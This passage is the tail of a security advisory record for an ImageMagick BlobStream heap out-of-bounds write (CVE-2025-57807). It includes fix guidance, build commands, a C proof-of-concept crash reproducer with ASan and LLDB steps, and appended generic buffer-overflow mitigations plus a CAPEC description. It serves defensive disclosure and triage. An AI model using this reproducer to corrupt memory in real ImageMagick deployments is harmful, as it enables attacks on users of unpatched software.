fail.\n    \n2. **Ensure capacity \u2265 need:**  \n    `target = MagickMax(extent + quantum + length, need);`  \n    (Optionally loop, doubling\u00a0`quantum`, until\u00a0`extent \u2265 need`\u00a0to preserve amortization.)\n    \n3. **Reallocate to\u00a0`target + 1`\u00a0before copying;**\u00a0then perform the move.\n    \n\n**Companion hardening (recommended):**\n\n- Document or restrict\u00a0[`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134)\u00a0on BlobStream so forward seeks either trigger explicit growth/zero-fill or require the subsequent write to meet the invariant.\n    \n- Centralize blob arithmetic in checked helpers.\n    \n- Unit tests: forward-seek-then-write (success and overflow-reject).\n    \n\n---\n\n## Regression \u0026 Compatibility\n\n- **Behavior change:**\u00a0Forward-seeked writes will either allocate to required size or fail cleanly (overflow/alloc-fail).\n    \n- **Memory profile:**\u00a0Single writes after very large seeks may allocate large buffers; callers requiring sparse behavior should use file-backed streams.\n    \n\n---\n\n## Vendor Verification Checklist\n\n- Reproduce with a minimal in-memory BlobStream harness under ASan.\n    \n- Apply fix; verify\u00a0`extent \u2265 offset + length`\u00a0at all write sites.\n    \n- Add forward-seek test cases (positive/negative).\n    \n- Audit other growth sites (`SetBlobExtent`, stream helpers).\n    \n- Clarify BlobStream seek semantics in documentation.\n    \n- Unit test: forward seek to large offset on\u00a0**BlobStream**\u00a0followed by 1\u20138 byte writes; assert either growth to\u00a0`need`\u00a0or clean failure.\n    \n\n---\n\n# PoC / Reproduction / Notes\n\n## Environment\n\n- **OS/Arch:**\u00a0macOS 14 (arm64)\n    \n- **Compiler:**\u00a0clang-17 with AddressSanitizer\n    \n- **ImageMagick:**\u00a0Q16-HDRI\n    \n- **Prefix:**\u00a0`~/opt/im-7.1.2-0`\n    \n- **`pkg-config`:**\u00a0from PATH (no hard-coded\u00a0`/usr/local/...`)\n    \n\n---\n\n## Build ImageMagick 7.1.2-0 (static, minimal)\n\n```bash\n./configure --prefix=\"$HOME/opt/im-7.1.2-0\" --enable-hdri --with-quantum-depth=16 \\\n  --disable-shared --enable-static --without-modules \\\n  --without-magick-plus-plus --disable-openmp --without-perl \\\n  --without-x --without-lqr --without-gslib\n\nmake -j\"$(sysctl -n hw.ncpu)\"\nmake install\n\n\"$HOME/opt/im-7.1.2-0/bin/magick\" -version \u003e magick_version.txt\n```\n\n---\n\n## Build \u0026 Run the PoC (memory-backed BlobStream)\n\n**`poc.c`:**  \n_Uses private headers (`blob-private.h`) to exercise blob internals; a public-API variant (custom streams) is feasible but unnecessary for triage._\n\n```c\n// poc.c\n\n#include \u003cstdio.h\u003e\n\n#include \u003cstdlib.h\u003e\n\n#include \u003cMagickCore/MagickCore.h\u003e\n\n#include \u003cMagickCore/blob.h\u003e\n\n#include \"MagickCore/blob-private.h\"\n\n  \n\nint main(int argc, char **argv) {\n\nMagickCoreGenesis(argv[0], MagickTrue);\n\nExceptionInfo *e = AcquireExceptionInfo();\n\nImageInfo *ii = AcquireImageInfo();\n\nImage *im = AcquireImage(ii, e);\n\nif (!im) return 1;\n\n  \n\n// 1-byte memory blob \u2192 BlobStream\n\nunsigned char *buf = (unsigned char*) malloc(1);\n\nbuf[0] = 0x41;\n\nAttachBlob(im-\u003eblob, buf, 1); // type=BlobStream, extent=1, offset=0\n\nSetBlobExempt(im, MagickTrue); // don\u0027t free our malloc\u0027d buf\n\n  \n\n// Step 1: write 1 byte (creates BlobInfo + sets offset=1)\n\nunsigned char A = 0x42;\n\n(void) WriteBlob(im, 1, \u0026A);\n\nfprintf(stderr, \"[+] after 1 byte: off=%lld len=%zu\\n\",\n\n(long long) TellBlob(im), (size_t) GetBlobSize(im));\n\n  \n\n// Step 2: seek way past end without growing capacity\n\nconst MagickOffsetType big = (MagickOffsetType) 0x10000000; // 256 MiB\n\n(void) SeekBlob(im, big, SEEK_SET);\n\nfprintf(stderr, \"[+] after seek: off=%lld len=%zu\\n\",\n\n(long long) TellBlob(im), (size_t) GetBlobSize(im));\n\n  \n\n// Step 3: small write \u2192 reallocation grows by quantum+length, not to offset+length\n\n// memcpy then writes to data + offset (OOB)\n\nconst unsigned char payload[] = \"PWN\";\n\n(void) WriteBlob(im, sizeof(payload), payload);\n\n  \n\n// If we get here, it didn\u0027t crash\n\nfprintf(stderr, \"[-] no crash; check ASan flags.\\n\");\n\n  \n\n(void) CloseBlob(im);\n\nDestroyImage(im); DestroyImageInfo(ii); DestroyExceptionInfo(e);\n\nMagickCoreTerminus();\n\nreturn 0;\n\n}\n```\n\n---\n\n`run:`\n\n```bash\n# Use the private prefix for pkg-config\nexport PKG_CONFIG_PATH=\"$HOME/opt/im-7.1.2-0/lib/pkgconfig:$PKG_CONFIG_PATH\"\n\n# Strict ASan for crisp failure\nexport ASAN_OPTIONS=\u0027halt_on_error=1:abort_on_error=1:detect_leaks=0:fast_unwind_on_malloc=0\u0027\n\n# Compile (static link pulls transitive deps via --static)\nclang -std=c11 -g -O1 -fno-omit-frame-pointer -fsanitize=address -o poc poc.c \\\n  $(pkg-config --cflags MagickCore-7.Q16HDRI) \\\n  $(pkg-config --static --libs MagickCore-7.Q16HDRI)\n\n# Execute and capture\n./poc 2\u003e\u00261 | tee asan.log\n```\n\n**Expected markers prior to the fault:**\n\n```\n[+] after 1 byte: off=1 len=1\n[+] after seek:  off=268435456 len=1\n```\n\nAn ASan\u00a0**WRITE**\u00a0crash in\u00a0[`WriteBlob`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)\u00a0follows (top frames:\u00a0`WriteBlob blob.c:\u003cline\u003e`, then\u00a0`_platform_memmove`\u00a0/\u00a0`__sanitizer_internal_memmove`).\n\n---\n\n## Debugger Verification (manual)\n\nLLDB can be used to snapshot the invariants; ASan alone is sufficient.\n\n```\nlldb ./poc\n(lldb) settings set use-color false\n(lldb) break set -n WriteBlob\n(lldb) run\n\n# First stop (prime write)\n(lldb) frame var length\n(lldb) frame var image-\u003eblob-\u003etype image-\u003eblob-\u003eoffset image-\u003eblob-\u003elength image-\u003eblob-\u003eextent image-\u003eblob-\u003equantum image-\u003eblob-\u003emapped\n(lldb) continue\n\n# Second stop (post-seek write)\n(lldb) frame var length\n(lldb) frame var image-\u003eblob-\u003etype image-\u003eblob-\u003eoffset image-\u003eblob-\u003elength image-\u003eblob-\u003eextent image-\u003eblob-\u003equantum image-\u003eblob-\u003emapped\n(lldb) expr -- (unsigned long long)image-\u003eblob-\u003eoffset + (unsigned long long)length\n(lldb) expr -- (void*)((unsigned char*)image-\u003eblob-\u003edata + (size_t)image-\u003eblob-\u003eoffset)\n\n# Into the fault; if inside memmove (no locals):\n(lldb) bt\n(lldb) frame select 1\n(lldb) frame var image-\u003eblob-\u003eoffset image-\u003eblob-\u003elength image-\u003eblob-\u003eextent image-\u003eblob-\u003equantum\n```\n\n**Expected at second stop:**  \n`type = BlobStream`\u00a0\u00b7\u00a0`offset \u2248 0x10000000`\u00a0(256 MiB) \u00b7\u00a0`length \u2248 3\u20134`\u00a0\u00b7\u00a0`extent \u2248 64 KiB`\u00a0(\u226a\u00a0`offset + length`) \u00b7\u00a0`quantum \u2248 128 KiB`\u00a0\u00b7\u00a0`mapped = MagickFalse`\u00a0\u00b7\u00a0`data + offset`\u00a0far beyond base; next\u00a0`continue`\u00a0crashes in\u00a0`_platform_memmove`.\n    \n---\n\n## Credits\n\n**Reported by:**\u00a0Lumina Mescuwa\n\n---",
  "id": "GHSA-23hg-53q6-hqfg",
  "modified": "2025-11-03T21:34:26Z",
  "published": "2025-09-05T20:09:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57807"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ImageMagick/ImageMagick"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ImageMagick BlobStream Forward-Seek Under-Allocation"
}

Mitigation

Pre-design: Use a language or compiler that performs automatic bounds checking.

Mitigation
Architecture and Design

Use an abstraction library to abstract away risky APIs. Not a complete solution.

Mitigation MIT-10
Operation Build and Compilation

Strategy: Environment Hardening

  • Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include: the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice, which provide various mechanisms including canary-based detection and range/index checking.
  • D3-SFCV (Stack Frame Canary Validation) from D3FEND [REF-1334] discusses canary-based detection in detail.
Mitigation MIT-11
Operation Build and Compilation

Strategy: Environment Hardening

  • Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.
  • Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. Imported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as "rebasing" (for Windows) and "prelinking" (for Linux) [REF-1332] using randomly generated addresses. ASLR for libraries cannot be used in conjunction with prelink since it would require relocating the libraries at run-time, defeating the whole purpose of prelinking.
  • For more information on these techniques see D3-SAOR (Segment Address Offset Randomization) from D3FEND [REF-1335].
Mitigation
Implementation

Implement and perform bounds checking on input.

Mitigation
Implementation

Strategy: Libraries or Frameworks

Do not use dangerous functions such as gets. Look for their safe equivalent, which checks for the boundary.

Mitigation
Operation

Use OS-level preventative functionality. This is not a complete solution, but it provides some defense in depth.

CAPEC-92: Forced Integer Overflow

This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code.